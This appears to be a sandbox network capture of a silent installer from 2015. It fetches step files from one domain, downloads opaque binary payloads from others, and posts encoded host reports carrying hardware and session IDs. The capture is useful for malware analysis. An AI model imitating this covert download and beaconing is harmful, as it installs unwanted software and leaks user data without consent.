GET /?step_id=1_2&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.winnerican.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:44:23 GMT
Content-Type: text/html
Content-Length: 8282
Connection: close
Content-Disposition: attachment; filename="1_2.txt"
..B.H.a.D.W.E.e.6.n.H.k.X.a.f.H.r.p.n.O.3.0.p.F.k.D.e.u.8.y.H.u.4.q.C.K.4.s.J.b.D.E.E. .h.U.Y.L.K.z.w.L.i.K.M.3.b.Q.Y.d.G.0.Q.B.m.g.7.I.G.H.d.8.V.G.W.k.w.Q.6.0.N.Z.8.b.5.2.Q.5.D.I.Z.w.l.E.0.g.F.l.T.K.D.m.s.V. .C.H.c.p.H.f.q.v.f.D.2.B. .7.E./.O.V.e.k.H.f.P.d.A.q.z.U.s.C.b.O.1.Z. .d.w.p.2.M./.E.M.v.O.c.b.u.2.W.h.o.j.5.z.2.t.r.7.0.M.N.X.O.r.e. .U.7.k.s.Q.z.Y.N.a.u.S.A.a.m.m.H.w.T.y.g.P.4.c.E.o.V.N.2.g.p. .S.V.p.S.y.a.x.4./.o.v.H.i.Y.d.A.I.T.X.s.y.F.X.0.L.L.z.M.p.B.E.B.A.8.K.V.y.z.V.P.t.7.k.B.6.v.v. .l.z.e.z.7.S.6.T.i.C./.h.s.j.p.u.L.m.h.U.v.l.a./.O.b.Q.M.b.V.n.q.H.P.3.y.0.4.n.w.9.o.C.v.V.5.y.K.L.7.7.4.k.a.A.V.b.g.N.X.N.v.7.T.3.5.a.y.I.9.0.y.t.U.o.U.H.L.L.L.L.8.d.s.p.T.V.B.s.E.9.F.m.O.e.M.V.O.R.7.z.G.w.W.F.o.6.d.H.l.x.c.k.L.w.p.C. .X.B.Q.x.n.L.T.O.n.v.y.B.A.4.m.G.w.1.L.m.O.C.y.L.V.e.h.Y.W.I.J.l.z.L.V.8.W.e.4.x.Y.X.w.E.Q.o.1.V.d.C.n.G.G.l.p.n.G.0.R.R.m.3.J.I.6.B.W.i.x.J.r.H.X.l.c.8.i.m.6.8.J.p.T.5.j.k.e.M.o.W.I.U.a.7.B.g.9.6.6.D.l.6.l.J.J.W.K.B.5.H.Z.r.K.B.U.u.P.Q.W.x.5.N.r.D.0.V.f.7.4.M.m.P.w.5.z.K.8.n.D.9.L.Q.O.b.R.b.a.6.q.I.s.z.y.u.S.l.Q.M.w.K. .G.z.Y.i.d.o.Z.Q.Z.i.K.q.i.N.U.5.D.u.t.x.8.7.O.b.j.5.Q.h.l.i.G.a.3.E.x.N.k.E.u.3.W.X.l.r.w.K.z.G.S.v.7.y.5.r.0.3.J.y./.g.s.2.H.2.q.s.R.J.P.Z.A.J.K.t./.N.y.T.N.x.C.m.b.Z.w./.R.R.P.u.b.6.G.y.g.v. .D.2.X.g.w.V./.N.r.Y.v.C.u.E.H.O.y.3.j.r.Q.6.Z.5.5.4.I.5.M.v.c.8.w.f.q.N.S. .Y.b.H.K.y.I.z.A.n.D.h.8.Q.5.r.k.x.d.o.C.M.7.r.M./.G.k.C.K.t.U.4.j.T.F.Q.y.0. .y.4.o.s.I.X.y.v.U.l.d.u.O.V.M.O.6.K.A.V.O.B.1.T.7.O.s.H.z.a.v./.L.5.o.K.9.l.Y.l.H.d.C.C.Q.h.5.8.S.m.P.3.3.I.v.n.v.k.u.f.2.f.Y.C.
<<< skipped >>>
GET /?step_id=1_1&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.winnerican.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:43:38 GMT
Content-Type: text/html
Content-Length: 10014
Connection: close
Content-Disposition: attachment; filename="1_1.txt"
..P.6.9.J.3.Z.T.J.5.R.p.H.W.f.H.b.c.d.k.a.x.M.O.A.k. . .K.S.y.V.J.Y.N.W.r.s.j.C.T.3.q.e.c.s.o.5.V.j.R.f.y. .R.f.P.s.Q.j.k.9.A.q.S.I.t.x.U.m.W.z.I.K.M.v.j.s./.J.9.3.N.K.t.i.I.y.5.C.z.r.B.k.g.I.0.A.8.s.h.y.c.S.d.Y.e.0.3.c.l.Q.r.i.2.m.2.k.a./.h.n. .D.G.O.Y.R.2.B.5.B.9.3.V.x.T.T.D.l.i.a.N.I.8.L.B.D.1.k.j.p.P.8.J.l.F.7.v.P.3.q.n.X.I.B.h.R.y.O.x.b.Z.D.p.L.c.x.I.O.q.A.d.p.T.y.m.7.w.j.e.Z.I.a.2.F.t.l.c.q.N.L.D.n.F.K.b.9.V.x.U.M.Y.Q.S.m.U.z.n.N.U.W.o.A.R.P.d.Y.I.r.c.1.M.G.O.f.r.U.d.d.T.c.v.J.w.M.c.E.D.g.x.Z.r.f.o.V.e.q.7.N.5.P.J.X.u.7.e.B.P.Z.9.M.6.7.U.x.H.m.w.R.w.h.g. .a.J.E.p.Y.8.A.L.G.5.p.D.g.T.Z.e.m.2. .A.V.9.G.w.C.s.o.k.b.4.l./.P.I.p.Y.V.X.s.a.p.d.x.K.z.0.d.J.H.t.3.r.0.D.l.7.h.n.M.F.T.L.d.0.L.o.0.C.K.R.3.b.F.k.2.q.e.1.w.D.q.o.0.g.y. .9.W.A.y.4.N.Z.Q.a.2.N.U.k.F.N. .d.F.w.O.F.y.X.H.j.p.1.W.p.C.B.X.G.j.K.D.e.U.r.8.J.b.4.D.Q.n.x.s.q.B.H.V.K.L.G.W.9.f.l.j.v.7.V.p.u.3.n.s.j.x.W.s.N.u.0.h.N.n.k.I.J.6.E./.K.P.E.p.5.T. .E.8.S. .4.3./.6.t.u.P.v.b.C.f.J.k.7.M.j.b.B.i.N.Y.p.P.d.7.t.h.H.M.l.T.o.P.V.o. .0.7.r.H.T.M.7. .K.Z.R.i.o.P.S.R.b.7.Z.K.I.M.X.d.3.b.Z.U.v.V.s.e.o.o.L.5.a.M.M.v.f.5.9.R.M.B.6.H.5.p.9.G.x.B.w.b.D.y.g.i.f.o.q./.J.h.L.z. .U.J.v.O.8.1.0.T.T.R.U.q.w.D.3.F.D.9.W.B.t.l.G.4.M.S.e.v.W.e.a.c.q.j.1.p.H.L.m.u. .Z.9.T.E.Z.Z.2.L.N.N.m.V.j.8.a.C.O.b.q.T.L.R. .q.J.u.e.y.a.W.R.v.t.5.S.V.5.j.j.V.i.u.x.8.A.F.z.j.L.w.o.Q.5.8.k.H.2.P.A.v.Z.x.l.F.g.I.V.h.9.V.y.r.v.w.K.z.m.U.d.3.R.F.m.K./.L./.W.i.m.C.G.r.3.3.b.v.e.A.3.y.t.b.M.G.Z.q.E. .e.N./. .U.K.i.D.E.i./.7.Q.m.x.2.p.S.k.S.s.M.q.x.a.i.n.j./.J.b.E.i.4.w.g.G.M.g.u.F.h.D.z.t.L.P.c.
<<< skipped >>>
GET /?e=bsp&clsb=1&publisher=55680&country=US&dd=5&cid=767&vn=153&ind=2999701604659561094&exid=&ssd=5870984237522070412&hid=4520001523740530703&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140118 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: bestories.org
Cache-Control: no-cache
Cookie: __cfduid=d6208cc7f1add1143864b04d60cf818e01421556241
HTTP/1.1 200 OK
Date: Sun, 18 Jan 2015 04:44:15 GMT
Content-Type: application/octet-stream
Content-Length: 210912
Connection: keep-alive
Content-Disposition: attachment; filename="wKjUaVakO6heQO.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
Server: cloudflare-nginx
CF-RAY: 1aa822e6ae3c0ed9-EWR
..z..7...U.k....).$X....D...D..........w.6......[....8@l...;9_w.....)L....Omg`....5Tq.....0p.....(.L... *Zq.....(o....@.P`....:cb......}.....1.f...<=]b....:Oj..... Ks....7.G..../Ut.....7C.....(H1.....Jz....]7O.....6N3....4S=.....-r.....!LA....>W*.....Ky.....$Cw....'Wh.....Mu......a3...2..N....j.\....*s.1...6al3...L!.......#......<X{....>.\....6.Y....5.gn....7Sf...../j.....9Mk....%Z......Ph....02gG...6.t#....r.,....R..,...0..N....nG;.....7V....y.xd....:Ty.....,u....SDbf....5rr....Vq/....Wn#E....8Fh...._.]....g.Uk.....Sb.....Qv..../!Vr...82]h....2Ww.....$Oi....l.)....8Lu....E?`....3.i$...Jw.!....].*....5..E...JkH0......n.....9u....;9K-......l.....&Ks....8H.....)Y9.....5Kv...U3Kh....}sy.....7......8H*....(Lt.....cB.....>Gm...\ Yf.....1k.....9Zr....#Uc.....Z}.....#Do....&./.....Y.....K Jo....6.y....0Rv.....fSr....".j....2Jb.....*......!M}....5@g.....6z.....m]o...[/\~.....$=.....$F`....?_u....AMs.....%Om...48Xm......9..... ]!....![m....3^7.....7V.....pNe....>J;.....(...... G*...\8T|.....$>.....8Hj....8Wt....h}u.....w.l...Bz.h.....En..... Vm....5_"....-Oy.....{yD...".Tl...<..B....&qP.....;hG.../.RE......x.....ypD...>.Y^.....s)......mN.....jZ.....WA....93S4...6.^^....,s!.... 0uT....kYk....?JO.....*n....58NO....nn@......n....#.|r.....Sw....QtV......j7...?dG.....0I,...._.b`...:..=.....q.....[z.f.....sN....&~S....&,rS....t.I...%..|....U.s....F.Of......^....W8j.....zfa.../.Q|....."j....*?q1.....Ys....'}k....!.WT...N.a ....k.M.....t.t...G.XN.....t_....Z.h....Vbo/....~.S......L....D.L[....-d6.....
<<< skipped >>>
GET /?step_id=1&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.winnerican.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:43:36 GMT
Content-Type: text/html
Content-Length: 28514
Connection: close
Content-Disposition: attachment; filename="1.txt"
..A.1.6.N.0.9./.Z.2.U.a.g.0.W.3.5.w.y.Y.V.5.o.B.2./.S.W.Z.P.s. .w.n.g.E.9.6.a.4.a.2.Z.T.N.u.x.J.G.o.7.g.h.Q.W.O.n.y.U.E.N.g.7./.r.I.w.B.q.A.P.E.U.k.k.N.7.d.z.f.S.2.G.0.k.N.V.3.a.u.f.X.r.a.5.w.4.X.C.q.A.o.7.o.m.K.K.C.n.a.j.F.d.R.N.P.s.M.L.n.P.m.b.B.D.b.D.k.A.i.p.f.w.N.X.h.V.r.q.o.S.x.U.L.S.U.U.0.n.b.8.X.C. .6.d.Q.e.9.u.r.r.i.3.s.7.h.k.x.I.2.t.o.s.0.N.W.W.t.l.N.A.5./.K.Y.n.h.i.K.9.P.6.R.S.5.6.5.z.H.7.Z.l.j.k.v.q.m.i.k.y.A.t.M.D.9.l.A.3.M.K.a.7.q.q././.b.I.V.m.T.C.C./.L.M.9.0.I.A.U.U.L.i.R.9.Y.s.U.M.H.k.y.8.v.6.a.M.M.J.u.g.8.X.3.I.i.a.R.W.6.B.S.W.L. .I.E.Y.G.u.o.T.b.4.7.G.v.B.k.e.n.g.q.p.q.i.M.I.M.F.j.L.p. .2.j.m.Q.N.o.c.o.z.m.2.q.a.5.2.k.4.5.4.2.5.r.X.M.B.g.K.j.I.Q.s.b.O.a.Q.F.I.e.J.9.B.R.e.I.t.U.I.7.W.4.I.5.0.j.z.M.E.F.y.W.S.H.K./.Q.h.e.h.O.m.H.h.P.b.G.P.2.O.K.o.w.C.O.k.f.7.k.z.y.C.M.s.m.L.2.w. .x.D.P.x.W.w.q.o.q.c.k.c.X.s.d.j.C.V.Z.u.q.j.R.S.V.D.e.s.1.l.p.E. .X.6.n.K.c.b.t.y.b.b.2.j.H.C.A.y./.K.R.B.v.4.4.0.Y.m.g.g.M.t.A.Y.8.r.V.D.M.E.w.e.h.E.c.Z. .Z.0.7.o.g.7.L.x.S.4.4.A./.N.f.C.e.T.L.k.d.X.9.R.r.E.S.r.0.x.2.f.E.m.3.U.A.Q.v.Q.a.W.A.9.N. .T.O.0.8.S.y.8.w.7.G.a.R.p.V.O.X.z.O.p.R.x.o.C.Y.L.z.X.U.t.D.k.f.x.1.4.r.S.y.3.F.4.U.7.N.T.j.L.P.Y.o.J.a.l.0.w.l././.D.A.3.d.z.p.f.m.p.J.L.k.t.3.B.Q.F.I.r.5.L.O./.v.v.e.a./.y.i.4.S.0.i.8./.1.W.R.K.c. .2.5.B.q.V.s.Y.6.9.B.h.U.d.d.v.8.3.m.Z.P.6.S.G.9.K.F.q. .B.I.x.Z.U.V.6.A.8.v.x.Q.p.y.g.2. .O.v.p.r.V.9.R.R.W.6.M.n.H.a.y.H.4.g.a.X.N.w.T.U.B.a.c.b.k.W.x.u. .5.j.l.I.4.w.v.p.n.U.D.E.X.9.1.Z.k.L.U.I.j.j.1.A.1.I.8.8.p.Z.b.2.u.3.e.5.3.P.s.H.R.t.k.e.4.U.3.K.W.A.C.n.u.9.6.r.o.H.B.X.A.6.f.
<<< skipped >>>
GET /?e=ytr&cht=2&dd=19&clsb=1&publisher=55680&country=US&ind=2999701604659561094&exid=&ssd=5870984237522070412&hid=4520001523740530703&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140118 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: bestories.org
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 18 Jan 2015 04:44:02 GMT
Content-Type: application/octet-stream
Content-Length: 1480430
Connection: keep-alive
Set-Cookie: __cfduid=d6208cc7f1add1143864b04d60cf818e01421556241; expires=Mon, 18-Jan-16 04:44:01 GMT; path=/; domain=.bestories.org; HttpOnly
Content-Disposition: attachment; filename="yNMtlpV56NSC6w.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
Server: cloudflare-nginx
CF-RAY: 1aa822905ef50ed9-EWR
..z......4.k....|.l2....=...=.......zq>$........[XsUX^,* >d=............l`#..V&90..............`h~.zU >...............,h`F.r-#65..............$pXN..%;.=.............uw3MK[r.6..............ka4@H^}.5..-...........i"rZH..' .).............lwj^P.$;...............cv'nw..=-..............f|7mAI117.J^...........89&....`.!^=............:R(h.z{.U[A............`w&.cY ;...............mklTOK!.................kaIDX2./NH1............ #?"FP :,..............w{h\..#=9..F...........siKpH_*=-...............zQg....................e}oNVb..kTVN...........1ox..^&`lWEO...........nbxRXV.!................gp{ZG.#0...............kyuUE] >f-.............q6mMGW7;;..$............fpR.c/%9...............f~qu9w'20?'............@nn@..tamSBL...........xBvOH.a.)..X............46FE`4>...6............uapFKs)>;TV&...........lmrOJ.O................d~uUes.o#WVK............L"&.w.{cM^D.............KNHXR4&<..............VeqP.N-#6E..............ecE.B))w...............'[s.\L-1-J.............pnvI.O)q>.R............t~7ABU3;-..Z............%4oFP!83A..............&~nCWOh'1I.............v`pJ\N$<7F.............nxb@@[b,6C..............{vl.QG>0...............i0hGGYg 2.S............{bm.]Q ?z...............DZ..B.l8...............iv=ZVM=5-.U............v!:f\R%:|E1............n~c.YP&n,...............z:= w)?%4..............d~sL[S;'?..Q...........bbu..Kx..(.............PYgUHG..7..!.............GmY.r}#...............]`HU....n%.............o9_L...} PUI............]0.ib..%..)............pDk\..{.;..............B}`Hw.t..2.:...........ig/...f|.1.....
<<< skipped >>>
POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.flagmisterlibcontent.net
Content-Length: 3599
Cache-Control: no-cache
data=DUIqmSWMEahsc1d89/0mxMGHyAk6jiRdiFXkLYwLp3r6FfGQoSFPra4Y64x4m6dFoiGDd73Q/M48MO9qpRi7WDD4Icr49mhmgp3UCp0ULD68k6PM71BTSgKyp4UtCzb/I7calIV28Fp9Fk6O7X1s4n xRXGLFXouCz131OhJLRgVhRUQmpG2uyHi/oeDu/YC cTxe5/CLhyLs8yKV6u OXfbhQK7k8u kA3TQPh3S1fFSE1YW7TcMuUOQaTRNb71 s12By8y6i/3N0XliF9daJnSnMpVxN7/toFON6SiBSLsfNNs2J6XAe8dULxokbS0mDJx0fhDDRAX8eD53l2aeiPPaUaNR/RHubtny/a5HR sKdXAPmbt/r7Ii7ftU2sqJFhjXo 4GEN/skO99B3CXXmIyaqNUfAAn9R7hfCF8zk42 Z4KrRuBaye59jb01tcSmugD0oajvw23T8smpCSXJzz5r6N8 dL1JcTPhJ9rik6/33FVAPVqA0q3YpHJhtdj6Ms6liYkLoYeO g9DsdM9clCl3ejCKEy00F9sSSqae62j8Di71wcHvhVivbJJq/TMmaPw/gKLdV7oN0MU3vX1hqdDZTTo6Io8PlAnKaELUzGkc/cqrgaYEgaACfigswicQfTYRWGjZbqSKAF02NadRy8brs/yGB1ALEH17C5iCByNzmRc DMNmRlWkvC3WK0gkGYDEg6VE90ketiqkflH9dmtN70IrpoFHaYj ZxlTOltpHSF5eEVnlk3 xiDOItMVrMC7c0pYZzgxf09EQSrHsvfZzLjY6uTcpFx82vrgbpFSf1A1mzyhwQ6Fb3oX3mcl fOmqw6cdstbye7c9kAcQxHlFEhwhC9CGic8S4ji0rAjuGT 2vp1JOmh RzPNQduFzc2KdZH8w 4U/GcVR3wy&report=MSy0J2RF0OYs70YUMOfDCgz2TvPcHTaFwwqNaG0k0EwI uA8JCQ7aidKCuHS/N5k3nBmO/68oWnIKEiNXsEhO4A/kKp7x1hnwysXNqUyDhPZFQeYKKJyspw/3vabcB8vJE67aG5Tcg0Qz10WxmpkgM/Dn0i Gei8ma2yMtpOAVHDB6RkwoIDtgYoOU9QTd/MKHa0g B3tL vupMPKeg1DAcueD9/7iz3xZz2hQFGp7Rr/sk67Vr2oj2tDd jo5h5nmIdBsveJCyUuhRPfDcit6rHewVKG2c5LAigwwy8BW609WdkQG3ObpGRktM/cIl9EzyMImu9IN48DHzIbTq74/38vH6Hlgrn0HlvxlwbXz20k yhQKpmJUkKdVn0N5v
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:43:36 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..
GET /?e=dfd73&cht=2&dcu=1&cpatch=2&dcs=1&pf=1&clsb=1&publisher=55680&&&country=US&ind=2999701604659561094&exid=&ssd=5870984237522070412&hid=4520001523740530703&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140118 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: masterial.net
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 18 Jan 2015 04:43:45 GMT
Content-Type: application/octet-stream
Content-Length: 1523454
Connection: keep-alive
Set-Cookie: __cfduid=df7bd18451bc1541b0698dd4c8d03ba811421556225; expires=Mon, 18-Jan-16 04:43:45 GMT; path=/; domain=.masterial.net; HttpOnly
Content-Disposition: attachment; filename="CmPMt7BDxLvtoE.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
Server: cloudflare-nginx
CF-RAY: 1aa8222b16e90ed3-EWR
..z..>..Ij`k.....D"......x...x.........sG=......v(..A[.....J...0..M...'..qS..,..E_.....v...z..r...6.. [..q..]I..i..*J...../U.....5T.....$I.....'......8i.....$n.....%q.....:z.....q3..u..t....O.)e...Q.:v...0.4n...C.4x..tH.3}...M.'g...H.8b...D.'{...K. y...@..n...B.*}...C.4....B.-w...@.F~.._D. b..vV./)..W-.d,...E..0...B......Y..n...F......G..s..ZY..j..#O..l..$#..r..5[..l..5M.....(Z.....#J.....4S.....>^.....Sn..o..=k.....&q.....5......s)..R..er...M.-q...Q.<a...D."u...A.=...tV.tf...@.4|...I.&b...A.'d...Z.p`...\.:m...@.(c...O.5`..l@.,}...I.2|...X.zy...X./c...Y.,x...[..y......e...X..v...C..c..mG..%..p...7..6S..q..1W..o..YT..}.. J.....3Y..F..5R.....1H.....&P.....:i.....<`.....8m.....;m..... r...L.'t..pL.9p..Q..rc..A\.8=....._o...X..y.....12..L..e=.....r ..X..(...... ....N.s!..C..-......a9..FQ.?q..Z\.J......o)..J..Re.._...=...>..7...L..7..G...1..NA..4..m...1..L[..?..XT..{..r.../..IH..D..n......iY....._F.....%...]..u ..T..9...K..a/..j..(!..G..5a..R].6"...D.<~..EZ.i-..G..`...BR..3..C..^t.....,#...B..=..G..!......m%..BU.&m..VX.U}.....k-..F..Va..S..w9...".?;...H.3;..C..c=..JE..8..Q...5..pW..;..o^.....N... ..MD..8..j...b..m]..f..[B../..<*.....o...W..10.....}...R..k......$......7r............Bn.....|8..Y..Cv..N..d,.../..c...4.;p..sY.*....@.O:...<.zs..I..i'..@_.r$.....n$..X..ix..[].p...zN.#f...C.8e...C./{...5. t..^^.-z..C..)s...Q..y...)..p...T..d...X......Z..v..6A..~..N\..6..sF..%..`M..u../J......M.....*L.....,O..y..&P.....>...F..-h..A..=a.....%r..r..-s...O. r...G.<i...M.&q...M.=y.....:z..pL.3}...M
<<< skipped >>>
POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.flagmisterlibcontent.net
Content-Length: 2460
Cache-Control: no-cache
data=HxWEfBVRV5BID9/XZTi11&report=EyUxCmWQR1aZCmbF56nS9u0gwVJJL5hwj16T3A9tYaeKXCXnDrk6VW1wwH9LJw0Q y4TfQtGdHer1Z/DPQKADo35pVNToOc7Vin8uYrzr7VPdsdmxXvQlU7Mqc6X6mzhmlSOvz0lew19t An6GorSJ4I2Xme9ioexNDctguWzIa2khbxFQRKfpgaj9zW10aabacFBQhLwGVYL2KogMzQjn31Xi8Pr3qeEkgtFc6//dX86hWywQInk9oodBAf6Bl9GKEWRdTbdaTmcM9LUXjKKMlhDwWzpKOjeKyCtEWWq48VvqlO/mz4OqMHg6bCuaXC/k9y3Yn94PghMEQcQDxHQZQsYxihRqGgXtE7yXhERwI/lIkVwLYxrfJVGKtln35OVLqntxia EVlwwkhV0hAAImUI nqWdWJC5QRWHZxzTUcxEH gtKI/HUd8S0hfdJn WZq9htzmWDZFL6vBJjWK0LZAJI7SMR825SG010hH/czZClCh2w1Lj7tTF2LWke90AHOjOrv1qBnXzKZp KLbWXsmPAyNnFbKdqVlsIv8p DtGtoMB9RQhdhicQzLHBOuR5FgGF1Hyv2TeDzAGZkddYMNdw9gumzxofpb iEQCp5iKHhbgxIppqbIe3RdQhTtzhezDjVw7Pksdr4eBNzBdlxJ2baiEDnzrfuznN4CTciRrVdMu42/epLpwtcijhRh9lPUiD0SOQXkuQx3mLXDITmXZ2voqF8LOxrPcmakrW9 UQNLEiozo1byNF5g0SymviApPABHLGBoYXk1Ye23mRt8WUGOUxCKdWWC8FY3eJNAV0LauEfUlf9RifZ mGfKT8U36CDfcUbmYY6o8rATYRRADXNugffQNn7dAbKjX8d7oeGDXVkvpN8DoQhWs035qd6oXD6sWR4wlKr7PIMWvOfCpyVspUhD1oqxEBe0P/ qG/w8 ShZcM58jZwsfthH0arIDGLlNaMviPQ31234xZV4Az3E6/uAc7fdX9vLh7NOGOsjF36d0le0VD4FLVbvO4RyYiSnkV15dtd2jZsA8iju0 UtEA7xbx Wv7RHzSseMzYAFtwRuSVuwDAY7tPURpgAs42zd8Z4 2zh TYu2k0oipSSpXqtPSXkiNwoxs/szpeSiLXErE/pBLjdBErqkze0t2IWKffFnLvwReo/q9lN STdtbCqAH/ritpKrNPVUCtYXPowcr/trLDD1ffCbf932V9K0mkelZaTxQC1T7PhsTl7ZpOnI1s41IYUL8Y3PbL/QJ5lv5OFRIy7ZnmYz
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:44:20 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..
GET /?step_id=1_1_4&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.winnerican.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:44:10 GMT
Content-Type: text/html
Content-Length: 10646
Connection: close
Content-Disposition: attachment; filename="1_1_4.txt"
..L.N.8.R.2.X.Z.R.P.b.R.m.B.K.Y.7.8.9.e.C.1.Y.D.d.K.g.o.8.i.s.2.V.L.S.F.e.R.G.t.n.E.k.u.K.e.t.V.X.c.m.a.L.X.8.u.B.T.m.o.c.a.F.l.X.i.s.N.r.4.I.B.0.B. .5.k.R.n.Y.b.E.n.Y.w.D.4.9.K.H.l.R.z./.p.Y.c.l.E.4.f.6.S.J.J.J.6.H.s.W.W.4.k.o.g.s.I.t.x.I.x.s.k.t.h.L.x.k.U.v.U.U.E.S.J.k.7.L.d.m.Z.e.p.H.R.v.d.u. .t.N.S.1.n.O.w. .T.X.p.h.s.J.w.E.4.C.M.p.c.R.7.v.s.7.K.J.4.e.I.b.d. .O.4.T.Z.C.2.l.D.8.V.n.k.P.N.L.4.P.R.D.i.Y.6.K.b.l.q.c.a. .S.O.1.p.j.6.Q.k.Q.p.r. .y.y.X.Z.I.X.T.t.O.M.j.G.w.x.K.m.C.Y.d.Z.V.X.N.H.z.j.O.2.T.H.B.K.3.0./.7.T.a.i.n.I.4.D.V.i.Q.k.M.U.d.I.J.3.z.Z.b.e.W.R.1.1.E.x.k.R.C.Q.J.w.C.t.g.F.g.3.a.8.1.0.y.h.t.V.G.1.v.S.u.e.e.m.M.b.j.d.9.I.7.G.H.2.6.D.j.r.D.p.T.F.9.a.g.V. .Q.D.a.j./.a.o.T.K.W.k.Q.M.r.Y.n.g.w.5.K.l.6.b.J.0.V.w.A.4.H.1.t.v.0.P.m.R.K.z.A.D.2.J.4.z.J.b.U.W.k.9.X.J.d.w.5.J.q.l.V.I.A.P.n.D.I.X.M.T.9.E.Q.n.D.U.v.a.W.R.s.F.D.H.i.t.s.M.s.f.K.u.l.Y.A.J.8.c.9.M.N.A.Z.n.h.q.L.g.1.n.I.5.y.N.o.L.q.i.R.x.B.Z.g.U.6.x.v.5.P.p.J.A.g.z.5.P.0.f.Y./.8.4.a.t.Y.I.k.i.g.T.B.p.e.L.w.A.7.t.E.x.v.d.w.4.q.8.w.s.4.Z.k.P.u.U.M.f.3.k.b.u.T.0.I.o.g.O.F.q./.h.7.A.3.b.9.s. ./.I.E.c.t.u.p.C.p.D.L.b.C.o.M.P.m.S.D.5.U.Y.S.W.I.Z.E.N.O.5.K.T.N.Y.p.z.R.f.g.A.S.m.M.g.s.i.x.I.x.u.g.X.Q.2.N.j.g.r.j.W.U.X.S.m.s.x.r.G.b.8.q.C.e.w.Y.s.u.h.1.8.4.w.y.C.k.P.V.m.O.e.5.b. .d.Q.Z.y.x.4.M.G.5.b.a.3.w./.R.s.W.R.G.k.y.E.Q.K.L.9.w.K.o.E.2.p.F.6.T.y.n.I.M.C.B.M.K. .H.t.C.b.e.g.N.s.J.a.N.C.p.1.C.G.A.U.a.i.2. .2.g.y.S.O.F.u.4.6.5.U.R.n.g.X.u.O.g.1./.p.y.r.i.L.U.c.s.n.I. .p.4.l.c.Z.X.v.2.u.a.p.K.Y.o.A.4.f.m.o.n.o.x.e.P.D.f.z.L.t.0.N.f.b.c.A.M.B.z.h.P.d.r.x.C.
<<< skipped >>>
GET /?step_id=1_1_3&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A HTTP/1.1
